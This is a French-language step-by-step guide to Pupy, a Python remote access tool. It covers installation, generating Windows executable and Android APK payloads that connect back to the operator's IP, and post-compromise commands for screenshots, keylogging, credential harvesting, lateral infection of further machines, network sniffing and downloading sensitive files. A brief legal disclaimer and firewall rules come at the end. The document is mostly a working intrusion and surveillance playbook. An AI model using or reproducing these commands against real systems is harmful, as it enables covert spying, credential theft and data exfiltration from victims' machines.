🐶 Utilisation de Pupy - Guide Complet
Pupy est un RAT (Remote Access Tool) écrit en Python, conçu pour fonctionner sur plusieurs systèmes d'exploitation, notamment Windows, macOS, Linux et Android. Ce guide couvre toutes les étapes, de l'installation à l'exploitation avancée, dans un cadre légal et éthique. 🚀
1️⃣ Pré-requis
- Une distribution Kali Linux ou équivalente.
- Python 3.x et Python 2.7 installés.
- Git pour cloner les projets.
- Docker (recommandé pour simplifier le déploiement).
- Machine cible dans un environnement isolé (VirtualBox/VMware).
2️⃣ Installation de Pupy
Étape 1 : Télécharger Pupy
Clonez le dépôt officiel :
git clone --recursive https://github.com/n1nj4sec/pupy.git
Accédez au répertoire :
cd pupy
Étape 2 : Installation des Dépendances
Installez les bibliothèques Python requises :
sudo apt update && sudo apt install python3-pip python2.7-dev build-essential -y
pip3 install -r requirements.txt
Étape 3 : Installation avec Docker (Facultatif)
Si vous préférez utiliser Docker :
sudo apt install docker.io -y
sudo docker build -t pupy .
sudo docker run -it pupy
Cette méthode simplifie la gestion des dépendances.
3️⃣ Génération de Payloads
Étape 1 : Configurer un Serveur Pupy
Démarrez le serveur Pupy :
python3 pupysh.py
Vous serez accueilli par une interface CLI interactive.
Étape 2 : Générer un Payload
Dans l’interface CLI, utilisez la commande gen pour créer un payload :
gen -f exe_x86 -O windows -A connect -H <Votre_IP> -P 443
- -f : Format du payload (exemple : exe_x86 pour un exécutable Windows 32-bit).
- -O : Plateforme cible (Windows, Linux, Android, etc.).
- -A : Mode de connexion (connect pour que la cible se connecte au serveur).
- -H : Adresse IP du serveur Pupy.
- -P : Port utilisé par le serveur.
Le payload généré sera enregistré dans le répertoire output.
4️⃣ Scénarios Pratiques pour Pupy
Scénario 1 : Capture d’Écran
Objectif : Générez un payload, connectez-vous à une cible et capturez des captures d’écran pour analyser son activité.
- Générez le payload pour une cible Windows :
- Connectez-vous à la cible et utilisez la commande :
- Téléchargez l’image capturée pour analyse :
gen -f exe_x86 -O windows -A connect -H <Votre_IP> -P 443
screenshot
download /path/to/screenshot.png
Scénario 2 : Keylogging
Objectif : Activez un keylogger pour enregistrer les frappes clavier sur une machine compromise.
- Interagissez avec une session cible :
- Activez le keylogger :
- Surveillez ou téléchargez les données collectées :
sessions
keylogger start
keylogger dump
Scénario 3 : Propagation Latérale
Objectif : Utilisez les identifiants récupérés pour se propager à une autre machine sur le réseau.
- Récupérez les identifiants avec la commande :
- Utilisez ces identifiants pour générer un autre payload et infecter une autre machine :
creds
gen -f exe_x86 -O windows -A connect -H <Votre_IP> -P 4444
Scénario 4 : Surveillance du Réseau
Objectif : Analysez le trafic réseau entre les agents et le serveur pour identifier des anomalies.
- Activez un sniffer réseau sur la cible :
- Téléchargez les données capturées pour analyse :
sniffer start
sniffer dump
Scénario 5 : Exploitation Android
Objectif : Générez un payload Android et exécutez une session distante.
- Générez un payload APK :
- Transférez le fichier APK à la cible et interagissez avec elle :
gen -f apk -O android -A connect -H <Votre_IP> -P 443
sessions
Scénario 6 : Exfiltration de Données
Objectif : Identifiez et téléchargez des fichiers sensibles sur une machine cible.
- Listez les fichiers dans un répertoire cible :
- Téléchargez le fichier sensible :
ls /path/to/directory
download /path/to/important_file.txt
5️⃣ Sécurité et Conformité
⚠️ Avertissement : Pupy est un outil puissant destiné à des fins légales. Toute utilisation dans un cadre non autorisé constitue une infraction.
- Limitez l’accès au serveur Pupy avec des règles de pare-feu :
sudo iptables -A INPUT -p tcp --dport 443 -s <Votre_IP> -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j DROP